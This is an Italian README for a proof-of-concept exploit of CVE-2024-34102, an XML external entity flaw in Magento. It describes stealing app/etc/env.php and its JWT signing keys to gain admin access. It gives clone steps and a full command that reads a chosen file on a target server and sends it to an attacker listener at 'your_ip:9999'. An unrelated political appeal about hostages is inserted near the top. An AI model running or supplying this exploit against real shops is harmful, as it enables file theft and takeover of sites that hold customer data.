
Proof-of-concept exploit per CVE-2024-34102, una critica iniezione di entità XML in Magento, che consente l'esfiltrazione di file sensibili e l'accesso non autorizzato all'admin. Solo per uso didattico.
Chiediamo il ritorno sicuro di tutti i cittadini presi in ostaggio dal gruppo terroristico Hamas. Non ci fermeremo finché ogni ostaggio non sarà rilasciato e non tornerà a casa sano e salvo. Puoi aiutarci a riportarli a casa. https://stories.bringthemhomenow.net/
Questo repository contiene un proof-of-concept (PoC) per lo sfruttamento della vulnerabilità critica di iniezione di entità XML (CVE-2024-34102) in Magento. Questa vulnerabilità consente l'esfiltrazione di file sensibili, che possono poi essere sfruttati per ottenere accesso non autorizzato alle funzionalità amministrative di Magento. Questo exploit è progettato a scopo educativo e deve essere utilizzato in modo responsabile.
Magento è una delle soluzioni di e-commerce più popolari utilizzate a livello globale. Nel giugno 2024, è stato scoperto un problema critico di iniezione di entità XML pre-autenticazione, identificato come CVE-2024-34102. Questa vulnerabilità può portare a conseguenze gravi, inclusa l'esfiltrazione del file app/etc/env.php da Magento, che contiene le chiavi crittografiche utilizzate per firmare i JWT.
requests (pip install requests)Clona il repository:
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
Esegui lo script con gli argomenti necessari:
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url: L'URL dell'istanza Magento di destinazione.--target-file: Il percorso del file sul server di destinazione da esfiltrare.--exfil-url: L'URL per ricevere i dati esfiltrati.python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999